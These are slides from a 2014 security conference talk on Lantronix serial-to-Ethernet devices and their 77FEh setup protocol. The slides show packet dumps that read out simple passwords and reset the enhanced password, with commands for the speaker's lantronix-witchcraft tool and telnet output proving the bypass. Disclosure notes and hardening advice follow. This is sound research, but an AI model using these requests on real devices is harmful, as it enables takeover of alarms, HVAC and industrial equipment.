DNA

Confidence 2014

Exploring treasures of 77FEhGetting access to Lantronix devices

Vlatko Kosturjak, Diverto@k0st

Who are you!?!!??

Security Jedi at DivertoBringing balance to the force

ExperienceOffensive (Penetration tester)

Defensive (Developer/System Administrator/...)

Have code in: Nmap, Metasploit, OpenVAS,

Author of free software: https://github.com/kost/

If you trust in certificatesCISSP, C|EH, CISA, CISM, CRISC, MBCI, ...

Agenda

Introduction - Lantronix

Physical access

WTF is 77FEh?

Vulnerabilities & Exploitation

Recommendations

Questions and answers

45 minutes

Lantronix

Source: www.lantronix.com

You can find them as integral part of

Alarms

HVACs

Pool monitoring systems

Sprinkler controllers

Hacked vacuum cleaners - Roombas

Embedded systems

Industrial systems

Source:http://ir.lantronix.com/phoenix.zhtml?c=122202&p=irol-newsArticle_Print&ID=904147&highlight

What they are running actually?

OSCoBos (mostly)

Evolution OS/Linux

ThreadX

Linux

Support1 or more serial ports

Modbus (few models)

10/100 Ethernet

Physical access

Like usualGame over

Serial accessNo password by design

RequirementsStandard TTL cable

BusPirate

...

Connecting to serial port...

9600 bps 8/N/1

Flow control: None

Most frequent services Available TCP/IP

Web (tcp/80)

Telnet (tcp/9999)

77FEh (tcp-udp/30718)

SNMP (udp/161)

Telnet administration interfaceWhat is this?Mostly information disclosuresSimple web serverServing applet JAR which talksto 30718 port

Device Discovery

Ask :)

Look if you have physical access

Passive

Active/ScanningStandard port scanning is fine with conservative timing

Broadcast UDP to specific Lantronix ports (30718)

BewareVersion scanning(-sV) or running vulnerability scanners may misconfigure device

Telnet administration

$ telnet 192.168.1.101 9999Trying 192.168.1.101...Connected to 192.168.1.101.Escape character is '^]'.

MAC address DEADDEADDEADSoftware version V5.8.8.3 (050801) XPTEXEAES library version 1.8.2.1Password :

So, WTF is 77FEh finally?

0x77FE = 30718 (10)

TCP/UDP protocol for device setupProprietary protocol

Used by DeviceInstaller (proprietary software from Lantronix)

Designed forSetup of device

Administration of device

Getting device info

Insecurity (sorry, had to write it, you'll see later ;) )

Sample 77FEh communication

[v] Sending 4 bytes:0x00000000 (00000) 000000f6 ....

[v] Received 30 bytes:(00000) 000000f7 00108005 58324400 df0e0000 ........X2D.....(00016) 62a7d944 00000000 00204a91 84fb b..D..... J...

./lantronix-witchcraft.pl -vvvvvvvvvvvvvvvv -Q

Query setup request (4)Query setup response (4)MAC address of the device (6)Device type

Interesting request #1

[v] Sending 4 bytes:

0x00000000 (00000) 000000f8 ....

[v] Received 124 bytes:

0x00000000 (00000) 000000f9 c0a809c9 00000000 54455354 ............TEST

0x00000010 (00016) c0a80905 4c020000 141e141e 0a0a0a0a ....L...........

0x00000020 (00032) cc070000 00000000 00000000 00000000 ................

0x00000030 (00048) 00000000 00000000 00000000 00000000 ................

0x00000040 (00064) 00000000 00000000 00000000 00000000 ................

0x00000050 (00080) 00000000 00000000 00000000 00000000 ................

0x00000060 (00096) 00000000 00000000 00000000 00000000 ................

0x00000070 (00112) 00000000 00000000 00000000 ............

Query setup (4)SimplePasswordInPlaintext(4)./lantronix-witchcraft.pl -vvvvvvvvvvvvvvvv -P

IPv4 (4)

Previous work

MetasploitRob Vinsonhttp://robvinson.org/blog/2012/07/08/lantronix-serial-to-ethernet/

https://github.com/robvinson/metasploit-modules

Metasploit modules for simple passwords by jgorhttp://www.rapid7.com/db/modules/auxiliary/scanner/telnet/lantronix_telnet_password

http://www.rapid7.com/db/modules/auxiliary/scanner/telnet/lantronix_telnet_version

ToolsSimple C program by jgorhttps://github.com/jgor/lantronix-telnet-pw

But...

Simple password is not set

Device still asks for password

Further diggingEnhanced password in place

You cannot get/reset the enhanced password easily

Length is bigger (4->16)

Challenge!!!

Introduction to enhanced passwords

Source: Lantronix documentation

Feature/TypeSimple PasswordEnhanced Password

Length416

Visible in query setupyesno

Source:Mohdafri.com

Interesting request - #2

[v] Sending 4 bytes:0x00000000 (00000) 000000f4 ....

[v] Received 32 bytes:0x00000000 (00000) 000000f5 09040000 00000000 54455354 ............TEST0x00000010 (00016) 352e382e 382e3300 00000000 00000000 5.8.8.3.........0x00000020 (00032)

./lantronix-witchcraft.pl -vvvvvvvvvvvvvvvv -C

SimplePasswordInPlaintext(4)Query ext versionRequest (4)Version (6)

Interesting request #3

Request to query configuration000000eX

Response to query configuration000000bX + followed by 126 bytes of setup

X=number of setup records (0 F):0 basic setup recordSimple password, IP...

1 security recordEnhanced password, AES key, SNMP...

2 specific products / situations

3 OEMs

...

Wrong! Request for security record 1 provides just zero bytes! HALF

Interesting request #4

Request to change configuration000000cX + followed by 126 bytes of setup

Response to change configuration000000bX

X=number of setup records (0 F):0 basic setup record

1 security record

2 specific products / situations

3 OEMs

Setting setup record 1 for security

[v] Sending 130 bytes:0x00000000 (00000) 000000c1 00000000 00000000 00000000 ................0x00000010 (00016) 00000000 00000000 00000000 00000000 ................0x00000020 (00032) 00000000 00007075 626c6963 00000000 ......public....0x00000030 (00048) 00000000 00000000 00000000 00000000 ................0x00000040 (00064) 00000000 00000000 00000000 00000000 ................0x00000050 (00080) 00000000 00000000 00000000 00000000 ................0x00000060 (00096) 00000000 00000000 00000000 00000000 ................0x00000070 (00112) 00000000 00000000 00000000 00000000 ................0x00000080 (00128) 0000 ..

[v] Received 4 bytes:0x00000000 (00000) 000000b1 ....

./lantronix-witchcraft.pl -vvvvvvvvvvvvvvvv -E

Setting Setup record 1Was successfulSet Setup record 1(security) requestSNMPCommunityString (13)EnhancedPassword(16)

Enhanced password gone
no password to enter!

$ telnet 192.168.1.101 9999Trying 192.168.1.101...Connected to 192.168.1.101.Escape character is '^]'.

MAC address DEADDEADDEADSoftware version V5.8.8.3 (050801) XPTEXEAES library version 1.8.2.1

Press Enter for Setup Mode

Authentication Algorithm Guess

AuthenticateEnhancedPasswordSimplePassword

EnhancedNot set

Ask for enhancedAsk for simple

Display setup menu

Enhancedset

Simpleset

SimpleNot set

PasswordOK

New tool: lantronix-witchcraft

77FEh protocol implementation

77FEh security related utility

All the tricks mentioned implemented

Free software: GPL2

Requirement: Perl

Available athttps://github.com/kost/lantronix-witchcraft

Basic usage:

Display Mac address:./lantronix-witchcraft.pl -Q

Display Simple Password (up to 4 characters)./lantronix-witchcraft.pl -P

Reset Security record (together with enhanced password)./lantronix-witchcraft.pl -E

Reset Security record without AES (with enhanced password) ./lantronix-witchcraft.pl -S

Dump setup records./lantronix-witchcraft.pl -G -D

Brave enough?

One command to rule them all

Display Mac address and simple password, dump setup records, reset security records together with enhanced password:

./lantronix-witchcraft.pl -C -Q -P -E -G -D

Still wondering why automatic scanning
is bad for Lantronix?

Dump of setup record:

00000030 00 1c 00 03 00 4e 00 53 00 50 00 6c 00 61 00 79 |.....N.S.P.l.a.y|00000040 00 65 00 72 00 2f 00 39 00 2e 00 30 00 2e 00 30 |.e.r./.9...0...0|00000050 00 2e 00 32 00 39 00 38 00 30 00 3b 00 20 00 7b |...2.9.8.0.;. .{|00000060 00 30 00 30 00 30 00 30 00 41 00 41 00 30 00 30 |.0.0.0.0.A.A.0.0|00000070 00 2d 00 30 00 41 00 30 00 30 00 2d 00 30 02 ff |.-.0.A.0.0.-.0..|

Correct way

AskSomeone responsible if they could have something like that

Send broadcast query packet to 77FEh

Identify ports 30718 open (TCP or UDP)

Dump setup records

Play ;)

Check if it is still working...If yes, perfect

If not: huh, but you should restore setup records somehow ;)

It's not about Lantronix...

...they warned the vendors about it in their documentation

Source: Lantronix documentation

Disclosure Problem

It's more about vendors who implement Lantronix in their devices

Whom to report?Lantronix I guess they know their protocol ;)

OEMs hard to find all their customers ;)

AwarenessConference

Tools

But maybe it could be done...

Add white list

Encryption/SSL?

Source: Lantronix documentation

Recommendations

Have some other device to VPN/SSL tunnel the services

Telnet only through VPN or other secure channel to administration interface

Disable 77FEh if not needed

Filter out 77FEh on network devices to only allowed ones

Disable other unneccesary services (SNMP, telnet, etc).

Summary

Source: duki@fb

Summary

There are ways to pass beyond authentication (if 77FEh is enabled)Simple passwords

Enhanced passwords

ToolsMetasploit Lantronix modules

https://github.com/kost/lantronix-witchcraft

RecommendationsDisable 77FEh if not needed or Filter out 77FEh on network devices to only allowed ones

Tunnel VPN/SSL all communication to these devices

FutureThere are things to research: way to obtain enhanced password or AES keys for example

Acknowledgements - Thanks

Previous work (Simple Passwords)Rob Vinsonhttp://robvinson.org/blog/2012/07/08/lantronix-serial-to-ethernet/

https://github.com/robvinson/metasploit-modules

Metasploit modules for simple passwords by jgorhttp://www.rapid7.com/db/modules/auxiliary/scanner/telnet/lantronix_telnet_password

http://www.rapid7.com/db/modules/auxiliary/scanner/telnet/lantronix_telnet_version

https://github.com/jgor/lantronix-telnet-pw

ColleaguesDalibor Dosegovi, hardware wizard

Thank you!

Questions and Answers@k0st

MosEisleyLab